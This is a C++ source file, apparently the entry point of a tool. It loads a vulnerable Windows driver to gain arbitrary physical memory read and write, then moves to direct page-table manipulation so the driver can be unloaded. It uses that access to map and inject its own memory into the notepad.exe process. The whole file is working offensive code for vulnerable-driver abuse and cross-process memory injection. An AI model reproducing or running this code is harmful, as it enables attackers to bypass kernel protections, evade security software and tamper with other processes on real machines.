#include "vdm_ctx/vdm_ctx.hpp" #include "mem_ctx/mem_ctx.hpp" #include "injector_ctx/injector_ctx.hpp" int __cdecl main(int argc, char** argv) { const auto [drv_handle, drv_key] = vdm::load_drv(); if (!drv_handle || drv_key.empty()) { std::printf("[!] unable to load vulnerable driver...\n"); return -1; } // read physical memory using the driver... vdm::read_phys_t _read_phys = [&](void* addr, void* buffer, std::size_t size) -> bool { return vdm::read_phys(addr, buffer, size); }; // write physical memory using the driver... vdm::write_phys_t _write_phys = [&](void* addr, void* buffer, std::size_t size) -> bool { return vdm::write_phys(addr, buffer, size); }; vdm::vdm_ctx vdm(_read_phys, _write_phys); nasa::mem_ctx my_proc(vdm); // read physical memory via paging tables and not with the driver... _read_phys = [&my_proc](void* addr, void* buffer, std::size_t size) -> bool { return my_proc.read_phys(buffer, addr, size); }; // write physical memory via paging tables and not with the driver... _write_phys = [&my_proc](void* addr, void* buffer, std::size_t size) -> bool { return my_proc.write_phys(buffer, addr, size); }; if (!vdm::unload_drv(drv_handle, drv_key)) { std::printf("[!] unable to unload vulnerable driver...\n"); return -1; } vdm.set_read(_read_phys); vdm.set_write(_write_phys); nasa::mem_ctx notepad_proc(vdm, util::get_pid("notepad.exe")); nasa::injector_ctx injector(&my_proc, ¬epad_proc); if (!injector.init()) { std::printf("[!] failed to init injector_ctx...\n"); return -1; } const auto ntdll_base = reinterpret_cast( GetModuleHandleA("ntdll.dll")); const auto ntdll_base_injected = injector.translate(ntdll_base); std::printf("[+] ntdll base -> 0x%p\n", ntdll_base_injected); std::printf("[+] press any key to close...\n"); std::getchar(); }